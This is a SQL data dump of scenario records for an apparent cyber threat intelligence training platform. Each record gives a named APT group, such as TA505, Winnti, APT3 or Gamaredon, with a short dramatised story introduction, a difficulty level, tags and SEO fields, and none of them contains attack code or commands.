(118, 'Operation Spy Banker', 'RTM Group', 'Investigate RTM Group\'s banking trojan and its impact on Russian financial institutions.', 'In the bustling financial district of Moscow, a silent menace lurks in the shadows. The RTM Group, a notorious cybercrime syndicate, has launched a new wave of attacks targeting Russian banks. Their weapon of choice: a sophisticated banking trojan that disguises itself within legitimate software, silently monitoring the activities of unsuspecting accountants. As a novice cyber intelligence analyst, you are tasked with unraveling this cyber conundrum, tracing the trojan\'s path, and thwarting the RTM Group\'s malicious objectives.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"RTM Group\\\",\\\"banking trojan\\\",\\\"Russian financial institutions\\\",\\\"cybersecurity training\\\",\\\"cyber threat intelligence\\\"]\"', '', 3, '2026-02-01 13:56:59', 'RTM Group Trojan Analysis in Russian Banking', 'Investigate RTM Group\'s banking trojan and its impact on Russian financial institutions.', 'operation-spy-banker', 1),
(119, 'Operation TA505', 'TA505', 'Investigate TA505\'s transition from Dridex to Clop ransomware in this advanced cybersecurity operation.', 'In the high-stakes world of cyber warfare, TA505 stands out as a formidable adversary. Known for its financial motivation, this threat group has evolved its arsenal from distributing Dridex to unleashing the devastating Locky and Clop ransomware. As a senior analyst, your mission is to dissect their tactics, techniques, and procedures (TTPs) through a series of alerts that uncover their sophisticated attack chain. Each alert will challenge your skills in threat detection and incident response, leading you through the complex layers of a multi-stage attack.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"TA505\\\",\\\"cybersecurity operation\\\",\\\"Dridex\\\",\\\"Locky ransomware\\\",\\\"Clop ransomware\\\"]\"', '', 5, '2026-02-01 13:57:39', 'Advanced Threat Hunting: Unraveling TA505\'s Ransomware Evolution', 'Investigate TA505\'s transition from Dridex to Clop ransomware in this advanced cybersecurity operation.', 'operation-ta505', 1),
(120, 'Operation Winnti Evolution', 'Winnti Group', 'Investigate Winnti Group\'s code-signing certificate theft and supply chain attacks against game distributors.', 'In the heart of the gaming industry, a silent predator lurks. The notorious Winnti Group, known for its sophisticated supply chain attacks, has once again set its sights on the gaming sector. This operation delves into how this APT group orchestrates code-signing certificate thefts and manipulates game distribution networks to execute broader attacks. Trainees will navigate through a complex web of espionage and financial motives, tracing the group\'s footprints and countering their every move.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Winnti Group\\\",\\\"Supply Chain Attack\\\",\\\"Gaming Industry Espionage\\\",\\\"Cyber Defense Training\\\",\\\"APT41\\\"]\"', '', 5, '2026-02-01 14:00:16', 'Winnti Group Espionage in the Gaming Sector: A Cyber Defense Simulation', 'Investigate Winnti Group\'s code-signing certificate theft and supply chain attacks against game distributors.', 'operation-winnti-evolution', 1),
(121, 'Operation Tick', 'Tick (Bronze Butler)', 'Analyze Tick APT\'s use of the Daserf backdoor in targeting Japan\'s defense and aerospace sectors.', 'In this training scenario, participants will dive into the operations of the notorious Tick APT group, also known as Bronze Butler. Known for its espionage activities focused on Japan\'s defense, aerospace, and satellite technology sectors, Tick APT employs the Daserf backdoor to infiltrate and exfiltrate sensitive information. As a beginner analyst, you will learn to identify and respond to these sophisticated threats through a series of alerts that simulate a real-world attack.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Tick APT\\\",\\\"Daserf backdoor\\\",\\\"cyber espionage\\\",\\\"Japan defense\\\",\\\"aerospace security\\\"]\"', '', 5, '2026-02-01 14:00:41', 'Tick APT: Uncovering Espionage with Daserf', 'Analyze Tick APT\'s use of the Daserf backdoor in targeting Japan\'s defense and aerospace sectors.', 'operation-tick', 1),
(122, 'Operation Blackgear', 'Blackgear (Topgear)', 'Engage in an advanced cyber operation to dissect Blackgear\'s Taiwan-focused espionage, analyzing blog-based C2 and Protux backdoor.', 'In the high-stakes world of cyber espionage, nations constantly battle unseen adversaries. Taiwan, with its pivotal geopolitical status, has become a prime target for the notorious APT group Blackgear. This operation invites you to step into the shoes of a senior analyst, tasked with dissecting Blackgear\'s intricate espionage campaign. Your mission is to unravel their blog-based C2 infrastructure and the deployment of the Protux backdoor, targeting critical government and telecommunications sectors. Prepare for an immersive experience that challenges your investigative skills and strategic thinking.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Blackgear\\\",\\\"espionage\\\",\\\"Taiwan\\\",\\\"blog-based C2\\\",\\\"Protux backdoor\\\"]\"', '', 5, '2026-02-01 14:01:01', 'Advanced Blackgear Espionage Simulation: Unraveling Taiwan\'s Threat Landscape', 'Engage in an advanced cyber operation to dissect Blackgear\'s Taiwan-focused espionage, analyzing blog-based C2 and Protux backdoor.', 'operation-blackgear', 1),
(123, 'Operation Patchwork', 'Patchwork (Dropping Elephant)', 'Investigate Patchwork\'s code recycling tactics targeting Pakistan\'s military using borrowed malware techniques.', 'In the complex realm of cyber espionage, the South Asian group known as Patchwork, or Dropping Elephant, has made its mark through a unique approach: code recycling. By borrowing code snippets from a variety of malware families, they craft sophisticated attacks aimed at Pakistani military and diplomatic entities. As a cybersecurity defender, your mission is to delve into these recycled code techniques and uncover the group\'s strategies before they succeed in their espionage objectives.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Patchwork APT\\\",\\\"cyber espionage\\\",\\\"code recycling\\\",\\\"South Asian threat\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-02-01 14:01:23', 'Operation Recycled Code: Unmasking Patchwork\'s Espionage Tactics', 'Investigate Patchwork\'s code recycling tactics targeting Pakistan\'s military using borrowed malware techniques.', 'operation-patchwork', 1),
(124, 'Operation Sidewinder', 'Sidewinder (Rattlesnake)', 'Explore Sidewinder APT\'s tactics against military and government sectors in Pakistan and China.', 'In this training scenario, participants will delve into the activities of the Sidewinder APT, also known as Rattlesnake, a group notorious for its aggressive targeting of military and governmental entities in South Asia. Trainees will be tasked with investigating how this threat actor rapidly exploits newly disclosed vulnerabilities to infiltrate systems, aiming to gather intelligence and disrupt operations within Pakistan and China. The scenario will unfold through a series of alerts, simulating the APT\'s attack chain, challenging participants to identify and mitigate these threats effectively.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Sidewinder APT\\\",\\\"cybersecurity training\\\",\\\"South Asia threat\\\",\\\"vulnerability exploitation\\\",\\\"APT investigation\\\"]\"', '', 3, '2026-02-07 21:11:35', 'Sidewinder APT: Investigating Military Targeting in South Asia', 'Explore Sidewinder APT\'s tactics against military and government sectors in Pakistan and China.', 'operation-sidewinder', 1),
(125, 'Operation Transparent Tribe', 'APT36 (Transparent Tribe)', 'Investigate APT36\'s targeting of Indian military with Crimson RAT malware and fake personas.', 'In this training scenario, participants will delve into the tactics of APT36, also known as Transparent Tribe, an advanced persistent threat group with a focus on India. Trainees will explore how this Pakistani group employs the Crimson RAT malware and sophisticated social engineering techniques using fake personas. The mission is to follow the digital breadcrumbs, understand the kill chain, and develop skills to counteract these tactics.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT36\\\",\\\"Crimson RAT\\\",\\\"cybersecurity training\\\",\\\"honeytrap\\\",\\\"social engineering\\\"]\"', '', 5, '2026-02-07 21:12:40', 'Beginner Training: Analyzing APT36\'s Crimson RAT and Honeytrap Tactics', 'Investigate APT36\'s targeting of Indian military with Crimson RAT malware and fake personas.', 'operation-transparent-tribe', 1),
(126, 'Operation Donot Team', 'Donot Team (APT-C-35)', 'Investigate Donot Team\'s espionage on South Asian governments using Android malware and multi-platform attacks.', 'The South Asian geopolitical landscape has become the battleground for a sophisticated cyber espionage campaign orchestrated by the notorious Donot Team (APT-C-35). This scenario challenges you to delve into their multi-platform capabilities, focusing on their Android malware strategies against government and military entities. As an advanced cyber threat analyst, your mission is to uncover, analyze, and mitigate the impact of these covert operations.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Donot Team\\\",\\\"espionage campaigns\\\",\\\"Android malware\\\",\\\"multi-platform attacks\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-02-07 21:12:40', 'Advanced Analysis of Donot Team\'s Espionage Campaigns', 'Investigate Donot Team\'s espionage on South Asian governments using Android malware and multi-platform attacks.', 'operation-donot-team', 1),
(127, 'Operation Bitter', 'Bitter (T-APT-17)', 'Investigate Bitter APT\'s exploitation of InPage vulnerabilities and ArtraDownloader malware in South Asia.', 'In this expert-level training scenario, participants will delve into the complex operations of Bitter APT (T-APT-17) targeting South Asian governments. This mission involves analyzing their exploitation of InPage vulnerabilities, specifically targeting Urdu-language users, and the deployment of the ArtraDownloader malware. Trainees will navigate through a series of alerts to uncover Bitter\'s sophisticated attack strategies and defend against their persistent threats.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Bitter APT\\\",\\\"InPage Exploit\\\",\\\"ArtraDownloader\\\",\\\"South Asian Cybersecurity\\\",\\\"APT Training\\\"]\"', '', 5, '2026-02-07 21:13:22', 'Advanced Threat Operation: Unmasking Bitter APT in South Asia', 'Investigate Bitter APT\'s exploitation of InPage vulnerabilities and ArtraDownloader malware in South Asia.', 'operation-bitter', 1),
(128, 'Operation Spring Dragon', 'Lotus Blossom (Spring Dragon)', 'Investigate Lotus Blossom\'s espionage targeting ASEAN military and government sectors using the Elise backdoor.', 'In this intermediate-level training scenario, participants will delve into the sophisticated operations of the Lotus Blossom APT group, notorious for its decade-long espionage campaign against ASEAN countries. Trainees will analyze the deployment of the \'Elise\' backdoor, a tool that has facilitated the group\'s persistent infiltration into government and military networks. As the investigation unfolds, participants will uncover the nuances of this operation, enhancing their threat intelligence and response capabilities.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Lotus Blossom APT\\\",\\\"Elise backdoor\\\",\\\"ASEAN espionage\\\",\\\"cyber threat intelligence\\\",\\\"government cyber attack\\\"]\"', '', 5, '2026-02-07 21:20:05', 'Lotus Blossom Espionage Campaign Training Exercise', 'Investigate Lotus Blossom\'s espionage targeting ASEAN military and government sectors using the Elise backdoor.', 'operation-spring-dragon', 1),
(129, 'Operation Keyboy  ', 'KeyBoy (APT23)', 'Investigate how KeyBoy (APT23) exploits Office vulnerabilities to target media and NGOs in Vietnam.', 'In recent months, the cyber landscape has been rattled by a series of sophisticated attacks targeting media organizations and NGOs in Vietnam. At the heart of these operations is KeyBoy, a notorious APT group known for its precision and stealth. Our mission is to unravel their espionage campaign, focusing on their exploitation of Microsoft Office vulnerabilities. As a beginner analyst, you\'ll decode their tactics and safeguard vital information.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"KeyBoy APT23\\\",\\\"Vietnam Espionage\\\",\\\"Microsoft Office Exploits\\\",\\\"Cybersecurity Training\\\",\\\"Media and NGO Targeting\\\"]\"', '', 5, '2026-02-07 21:20:25', 'KeyBoy APT23: Uncovering Vietnam-focused Espionage', 'Investigate how KeyBoy (APT23) exploits Office vulnerabilities to target media and NGOs in Vietnam.', 'operation-keyboy', 1),
(130, 'Operation Mustang Panda', 'Mustang Panda (TA416)', 'Investigate Mustang Panda\'s espionage activities using PlugX malware and COVID-19 lures against Mongolian and Southeast Asian targets.', 'In this training scenario, participants will delve into the activities of Mustang Panda, a notorious Chinese APT group known for targeting Mongolian and Southeast Asian entities. The mission focuses on their use of the PlugX malware, distributed through COVID-19 themed phishing lures. Analysts are tasked with identifying and analyzing the threat actors\' tactics, techniques, and procedures (TTPs) to understand their espionage objectives and methodologies.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Mustang Panda\\\",\\\"PlugX malware\\\",\\\"COVID-19 lures\\\",\\\"Chinese APT\\\",\\\"cyber espionage\\\"]\"', '', 3, '2026-02-07 21:20:43', 'Mustang Panda APT Operation: Analyzing PlugX Malware and COVID-19 Lures', 'Investigate Mustang Panda\'s espionage activities using PlugX malware and COVID-19 lures against Mongolian and Southeast Asian targets.', 'operation-mustang-panda', 1),
(131, 'Operation LuckyMouse', 'LuckyMouse (APT27)', 'Investigate LuckyMouse\'s espionage on government and telecoms via watering hole attacks and HyperBro malware.', 'In a high-stakes digital landscape, the Chinese espionage group known as LuckyMouse (APT27) has launched a sophisticated campaign targeting government and telecommunications sectors. Leveraging watering hole attacks and deploying the notorious HyperBro malware, this threat actor aims to infiltrate sensitive networks and extract valuable intelligence. Participants must dissect this operation, tracing the attack from initial access through to data exfiltration, all while navigating complex threat landscapes.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT27\\\",\\\"LuckyMouse\\\",\\\"cyber espionage\\\",\\\"watering hole attack\\\",\\\"HyperBro malware\\\"]\"', '', 5, '2026-02-07 21:21:04', 'Advanced Cyber Ops Training: Unraveling APT27\'s Espionage Tactics', 'Investigate LuckyMouse\'s espionage on government and telecoms via watering hole attacks and HyperBro malware.', 'operation-luckymouse', 1),
(132, 'Operation BlackTech', 'BlackTech (Palmerworm)', 'Investigate BlackTech\'s espionage in East Asia, focusing on router firmware tampering and TSCookie malware in Japan and Taiwan.', 'In a shadowy operation targeting the technological hubs of Japan and Taiwan, the notorious APT group BlackTech, also known as Palmerworm, has launched a sophisticated espionage campaign. Their methods include tampering with router firmware and deploying the elusive TSCookie malware family. As a senior cyber threat intelligence analyst, your mission is to unravel this web of deceit and protect critical East Asian infrastructures from further compromise.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"BlackTech\\\",\\\"APT\\\",\\\"Espionage\\\",\\\"TSCookie\\\",\\\"Router Firmware\\\"]\"', '', 5, '2026-02-07 21:21:22', 'BlackTech Espionage Campaign: Router Firmware Tampering & TSCookie Analysis', 'Investigate BlackTech\'s espionage in East Asia, focusing on router firmware tampering and TSCookie malware in Japan and Taiwan.', 'operation-blacktech', 1),
(133, 'Operation Calypso', 'Calypso APT', 'Investigate Calypso APT\'s espionage campaign using PlugX and ProxyLogon against Central Asian governments.', 'In the heart of Central Asia, government institutions are under siege by the notorious Calypso APT. Known for their sophisticated cyber espionage campaigns, Calypso has launched a new operation focusing on intelligence gathering. Leveraging the ProxyLogon vulnerabilities for initial access, they deploy PlugX variants to maintain a foothold and extract sensitive data. As senior cyber threat intelligence analysts, your mission is to dissect and counteract this advanced threat, piecing together the clues left by the adversaries.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Calypso APT\\\",\\\"PlugX malware\\\",\\\"ProxyLogon vulnerability\\\",\\\"cyber espionage\\\",\\\"Central Asia\\\"]\"', '', 5, '2026-02-07 21:22:15', 'Calypso APT: Unraveling Espionage in Central Asia', 'Investigate Calypso APT\'s espionage campaign using PlugX and ProxyLogon against Central Asian governments.', 'operation-calypso', 1),
(139, 'Operation Clandestine Fox', 'APT3 (UPS)', 'Uncover APT3\'s exploitation of CVE-2014-1776 and Pirpi backdoor in a beginner-friendly cybersecurity operation.', 'In a high-stakes scenario, defense contractors are under threat from a sophisticated attack by APT3. Utilizing a zero-day vulnerability in Internet Explorer, they aim to deploy the Pirpi backdoor. As a cybersecurity analyst, you are tasked with piecing together clues from five critical alerts to unravel their tactics and secure your organization.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"zero-day\\\",\\\"Internet Explorer\\\",\\\"CVE-2014-1776\\\",\\\"Pirpi backdoor\\\"]\"', '', 5, '2026-02-07 21:27:34', 'Investigate APT3\'s Internet Explorer Zero-Day Attack on Defense Contractors', 'Uncover APT3\'s exploitation of CVE-2014-1776 and Pirpi backdoor in a beginner-friendly cybersecurity operation.', 'operation-clandestine-fox', 1),
(134, 'Operation Emissary Panda', 'APT27 (Emissary Panda)', 'Conduct an expert-level investigation into APT27\'s targeting of aerospace and defense sectors using the HyperBro backdoor.', 'In an era where technology defines military superiority, APT27, known as Emissary Panda, has set its sights on the aerospace and defense industries. Leveraging the sophisticated HyperBro backdoor, this Chinese threat actor group systematically infiltrates and exfiltrates sensitive military technology. Your mission is to piece together the attack chain, drawing insights from a series of five alerts, each revealing a critical step in their operations.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT27\\\",\\\"cybersecurity training\\\",\\\"aerospace defense\\\",\\\"HyperBro backdoor\\\",\\\"military technology theft\\\"]\"', '', 5, '2026-02-07 21:22:39', 'Operation Sky Shield: Unveiling APT27\'s Aerospace Infiltration', 'Conduct an expert-level investigation into APT27\'s targeting of aerospace and defense sectors using the HyperBro backdoor.', 'operation-emissary-panda', 1),
(135, 'Operation Axiom', 'Axiom (Group 72)', 'Uncover Axiom\'s covert cyber-espionage tactics targeting NGOs and activists using the Hikit rootkit.', 'In the shadows of global diplomacy, the Axiom group, also known as Group 72, launches a clandestine operation targeting NGOs, dissidents, and pro-democracy organizations. Their mission: silence those who speak out for human rights. As a novice analyst, your task is to uncover their tracks, analyze the deployment of the Hikit rootkit, and understand their focus on neutralizing human rights activists. Navigate through a series of alerts that reveal Axiom\'s cunning strategies and stop them before they can cause irreparable harm.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"APT Group Axiom\\\",\\\"cyber-espionage\\\",\\\"Hikit rootkit\\\",\\\"human rights\\\",\\\"NGO cybersecurity\\\"]\"', '', 3, '2026-02-07 21:22:56', 'Operation Silent Dove: Axiom\'s Espionage on NGOs', 'Uncover Axiom\'s covert cyber-espionage tactics targeting NGOs and activists using the Hikit rootkit.', 'operation-axiom', 1),
(136, 'Operation Aurora 2.0', 'APT17 (Aurora Panda)', 'Investigate APT17\'s evolving tactics since the Aurora campaign, focusing on tech and defense targets.', 'In the aftermath of the infamous Aurora campaign, APT17, also known as Aurora Panda, continues to refine its tactics. This training scenario invites you to step into the role of an investigator tasked with unraveling APT17\'s latest maneuvers targeting the technology and defense sectors. As you track their operations, you\'ll explore their advanced tactics, techniques, and procedures (TTPs) and the persistent threats they pose.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"cyber espionage\\\",\\\"Aurora\\\",\\\"technology sector\\\",\\\"defense sector\\\"]\"', '', 5, '2026-02-07 21:23:17', 'APT17 Post-Aurora Operations: Evolution in Cyber Espionage', 'Investigate APT17\'s evolving tactics since the Aurora campaign, focusing on tech and defense targets.', 'operation-aurora-2-0', 1),
(137, 'Operation Deputy Dog', 'APT17 (Deputy Dog)', 'Uncover APT17\'s Internet Explorer zero-day campaign against Japan, focusing on CVE-2013-3893 and watering hole tactics.', 'In the heart of Japan\'s bustling business district, whispers of a looming cyber threat have reached the ears of a dedicated team of cybersecurity operatives. An elusive adversary, APT17, known as Deputy Dog, is orchestrating a sophisticated campaign leveraging a zero-day vulnerability in Internet Explorer. Their target: prominent Japanese organizations. Participants are tasked with dissecting this complex operation, tracking the adversary from initial access to the final data exfiltration, and fortifying defenses against future incursions.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"Zero-Day\\\",\\\"CVE-2013-3893\\\",\\\"Watering Hole Attack\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-07 21:23:36', 'APT17\'s Zero-Day Assault: Defending Japanese Enterprises', 'Uncover APT17\'s Internet Explorer zero-day campaign against Japan, focusing on CVE-2013-3893 and watering hole tactics.', 'operation-deputy-dog', 1),
(138, 'Operation Ephemeral Hydra', 'APT17', 'Engage in a complex investigation of APT17\'s strategic web compromise on policy think tanks using multi-staged JavaScript injection.', 'In a world where information is power, policy think tanks become prime targets for nation-state actors. As a senior cyber threat intelligence analyst, you are tasked with unraveling APT17\'s sophisticated strategic web compromise. Your mission: analyze the multi-staged JavaScript injection and determine how this threat actor selectively targets visitors to gain unauthorized access to sensitive information.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT17\\\",\\\"JavaScript Injection\\\",\\\"Cybersecurity Training\\\",\\\"Strategic Web Compromise\\\",\\\"Advanced Threats\\\"]\"', '', 5, '2026-02-07 21:24:05', 'Advanced APT17 Strategic Web Compromise Investigation', 'Engage in a complex investigation of APT17\'s strategic web compromise on policy think tanks using multi-staged JavaScript injection.', 'operation-ephemeral-hydra', 1),
(140, 'Operation Clandestine Wolf', 'APT3', 'Investigate APT3\'s exploitation of CVE-2015-3113 and its evolution to newer techniques.', 'In mid-2015, cyber defenders faced a sophisticated campaign leveraging a zero-day exploit in Adobe Flash, CVE-2015-3113, orchestrated by APT3. Known for their stealth and advanced tactics, APT3\'s campaign evolved over time, incorporating newer exploitation techniques. Trainees will dissect this operation, understanding the adversary\'s strategies and fortifying defenses against similar threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"Adobe Flash\\\",\\\"CVE-2015-3113\\\",\\\"Zero-Day\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-02-07 21:27:58', 'APT3: Analyzing the Adobe Flash Zero-Day Campaign', 'Investigate APT3\'s exploitation of CVE-2015-3113 and its evolution to newer techniques.', 'operation-clandestine-wolf', 1),
(141, 'Operation Double Tap', 'APT3', 'Uncover APT3\'s dual zero-day campaign exploiting Flash and Windows, focusing on vulnerability chaining and Pirpi malware.', 'In this intermediate training operation, participants will delve into a sophisticated attack orchestrated by APT3. The group has launched a dual zero-day campaign, exploiting vulnerabilities in both Flash and Windows systems. Trainees must analyze the intricacies of vulnerability chaining and follow the trail of Pirpi malware deployments. This scenario challenges participants to trace the attack from initial access to data exfiltration, employing analytical skills and APT3\'s known techniques.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT3\\\",\\\"zero-day\\\",\\\"Flash exploit\\\",\\\"Windows vulnerability\\\",\\\"Pirpi malware\\\"]\"', '', 5, '2026-02-07 21:28:20', 'APT3 Zero-Day Chain Investigation Training', 'Uncover APT3\'s dual zero-day campaign exploiting Flash and Windows, focusing on vulnerability chaining and Pirpi malware.', 'operation-double-tap', 1),
(142, 'Operation Lotus Blossom', 'Lotus Blossom (Elise)', 'Uncover Lotus Blossom\'s Southeast Asian espionage campaign against military targets using the Elise backdoor.', 'In the shadows of Southeast Asia, an advanced persistent threat looms over military and government networks. Known as Lotus Blossom, this APT group has launched a sophisticated espionage campaign, leveraging their custom Elise backdoor to infiltrate and extract sensitive information from the Philippine military. As a senior cyber threat analyst, it is your mission to dissect their tactics, techniques, and procedures, and to thwart their malicious endeavors.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lotus Blossom\\\",\\\"Elise backdoor\\\",\\\"cyber espionage\\\",\\\"military targeting\\\",\\\"APT investigation\\\"]\"', '', 5, '2026-02-07 21:46:54', 'Advanced Investigation of Lotus Blossom\'s Espionage Tactics', 'Uncover Lotus Blossom\'s Southeast Asian espionage campaign against military targets using the Elise backdoor.', 'operation-lotus-blossom', 1),
(143, 'Operation Hellsing', 'Hellsing', 'Investigate the rare APT-on-APT attack as Hellsing targets Naikon in an espionage group conflict.', 'In an unprecedented clash, the Hellsing group has launched an attack on rival APT group Naikon. This expert-level scenario immerses you in the high-stakes world of cyber espionage, where one group of state-sponsored hackers targets another. Your mission is to unravel the mystery behind this unusual conflict and understand the motivations and tactics of both sides. Analyze the attack chain and determine the implications of this inter-APT rivalry.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"APT-on-APT attack\\\",\\\"cyber espionage\\\",\\\"Hellsing\\\",\\\"Naikon\\\",\\\"cyber threat analysis\\\"]\"', '', 5, '2026-02-07 21:47:13', 'Hellsing vs Naikon: APT-on-APT Conflict Investigation', 'Investigate the rare APT-on-APT attack as Hellsing targets Naikon in an espionage group conflict.', 'operation-hellsing', 1),
(144, 'Operation Tropic Trooper', 'Tropic Trooper (KeyBoy)', 'Train to investigate Tropic Trooper\'s espionage targeting Taiwan and Philippines, focusing on military and government sectors.', 'In this training scenario, participants will dive into the covert world of Tropic Trooper, also known as KeyBoy. This APT group is known for its strategic espionage campaigns targeting Taiwan and the Philippines, particularly focusing on military and government institutions. Using the Yahoyah malware family, Tropic Trooper aims to infiltrate, execute operations, and exfiltrate sensitive data. Your mission is to unravel their tactics and uncover their objectives through a series of alerts.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Tropic Trooper\\\",\\\"KeyBoy\\\",\\\"Yahoyah malware\\\",\\\"cyber espionage\\\",\\\"cybersecurity training\\\"]\"', '', 3, '2026-02-07 21:47:32', 'Tropic Trooper Espionage Campaign Investigation', 'Train to investigate Tropic Trooper\'s espionage targeting Taiwan and Philippines, focusing on military and government sectors.', 'operation-tropic-trooper', 1),
(145, 'Operation Earth Lusca', 'Earth Lusca', 'Investigate Earth Lusca\'s use of ShadowPad and Cobalt Strike targeting governmental entities. Beginner-friendly.', 'In a rapidly evolving cyber landscape, the Chinese threat actor Earth Lusca has set its sights on government and intergovernmental organizations. Your mission is to analyze how they deploy ShadowPad backdoors and establish Cobalt Strike infrastructure. As a cybersecurity analyst, you will unravel their tactics, techniques, and procedures, piecing together the puzzle of a sophisticated cyber operation.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Earth Lusca\\\",\\\"ShadowPad\\\",\\\"Cobalt Strike\\\",\\\"cybersecurity training\\\",\\\"APT\\\"]\"', '', 5, '2026-02-07 21:47:55', 'Earth Lusca Cybersecurity Training: ShadowPad and Cobalt Strike Analysis', 'Investigate Earth Lusca\'s use of ShadowPad and Cobalt Strike targeting governmental entities. Beginner-friendly.', 'operation-earth-lusca', 1),
(146, 'Operation Sharp Panda', 'Sharp Panda', 'Explore Sharp Panda\'s espionage targeting Southeast Asian governments using the Soul framework and RoyalRoad RTF.', 'In this training scenario, participants will step into the shoes of a cyber threat intelligence analyst tasked with uncovering Sharp Panda\'s espionage campaign against Southeast Asian government entities. Utilizing advanced tools such as the Soul framework and the RoyalRoad RTF weaponizer, the attackers aim to infiltrate and exfiltrate sensitive governmental data. Trainees will navigate through multiple alerts to piece together the attacker\'s tactics, techniques, and procedures.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Sharp Panda\\\",\\\"APT Espionage\\\",\\\"Cybersecurity Training\\\",\\\"Soul Framework\\\",\\\"RoyalRoad RTF\\\"]\"', '', 5, '2026-02-24 03:12:43', 'Sharp Panda Espionage Investigation Training', 'Explore Sharp Panda\'s espionage targeting Southeast Asian governments using the Soul framework and RoyalRoad RTF.', 'operation-sharp-panda', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(147, 'Operation Scarlet Mimic', 'Scarlet Mimic', 'Investigate Scarlet Mimic\'s espionage campaign using FakeM malware against Uyghur and Tibetan activists.', 'In the shadows of the digital battlefield, Scarlet Mimic has launched a new espionage campaign targeting minority rights activists. Their tool of choice: FakeM malware, a sophisticated weapon aimed at the Uyghur and Tibetan communities. As a beginner analyst, your mission is to unravel this web of deceit, understand the unique targeting tactics, and protect the vulnerable.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Scarlet Mimic\\\",\\\"FakeM malware\\\",\\\"cyber espionage\\\",\\\"minority rights\\\",\\\"Uyghur Tibetan targeting\\\"]\"', '', 5, '2026-02-24 03:13:19', 'Operation Scarlet Sentinel: Unmasking Espionage Against Minority Rights Activists', 'Investigate Scarlet Mimic\'s espionage campaign using FakeM malware against Uyghur and Tibetan activists.', 'operation-scarlet-mimic', 1),
(148, 'Operation Groundbait', 'Groundbait (Prikormka)', 'Investigate Groundbait\'s 2014 Ukraine-focused espionage targeting activists and separatists.', 'In the tense prelude to the 2014 Ukraine conflict, the shadowy APT group known as Groundbait launched a covert espionage operation. Their targets were anti-government activists and separatists, aiming to gather intelligence and sow discord. As the cyber threat intelligence team, your mission is to dissect this campaign, tracing the steps of Groundbait through a series of alerts that reveal their tactics, techniques, and procedures.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Groundbait\\\",\\\"Ukraine Espionage\\\",\\\"Cybersecurity Training\\\",\\\"APT Group\\\",\\\"2014 Conflict\\\"]\"', '', 5, '2026-02-24 03:13:43', 'Groundbait Espionage Campaign: Ukraine 2014', 'Investigate Groundbait\'s 2014 Ukraine-focused espionage targeting activists and separatists.', 'operation-groundbait', 1),
(149, 'Operation BugDrop', 'Unknown (Ukraine-focused)', 'Investigate an APT\'s advanced surveillance targeting Ukrainian infrastructure via PC microphones and Dropbox exfiltration.', 'In the wake of escalating tensions, an unknown APT group has launched a sophisticated surveillance campaign against Ukrainian infrastructure organizations. Exploiting PC microphones for eavesdropping and using Dropbox for data exfiltration, this operation requires advanced investigative skills to uncover and mitigate the threat. Dive into the covert world of Operation Whisper and unravel the methods used by these elusive cyber adversaries.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"APT surveillance\\\",\\\"Ukraine cyber threats\\\",\\\"Dropbox exfiltration\\\",\\\"advanced threat protection\\\"]\"', '', 5, '2026-02-24 03:14:08', 'Operation Whisper: Unmasking the Surveillance Threat', 'Investigate an APT\'s advanced surveillance targeting Ukrainian infrastructure via PC microphones and Dropbox exfiltration.', 'operation-bugdrop', 1),
(150, 'Operation Armageddon', 'Gamaredon', 'Investigate Gamaredon\'s high-volume targeting campaign in Ukraine, focusing on template injection and links to Russian security services.', 'In this expert-level training scenario, participants will delve into the intricacies of Gamaredon\'s recent surge in cyber operations targeting Ukraine. With a focus on understanding the sophisticated template injection techniques employed and scrutinizing potential connections to Russian security services, trainees will navigate through a series of alerts that reveal the attackers\' strategic objectives and methodologies.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Gamaredon\\\",\\\"Ukrainian cyber defense\\\",\\\"template injection\\\",\\\"Russian APT\\\",\\\"cybersecurity training\\\"]\"', '', 7, '2026-02-24 03:14:43', 'Expert Analysis of Gamaredon\'s Ukrainian Campaign', 'Investigate Gamaredon\'s high-volume targeting campaign in Ukraine, focusing on template injection and links to Russian security services.', 'operation-armageddon', 1),
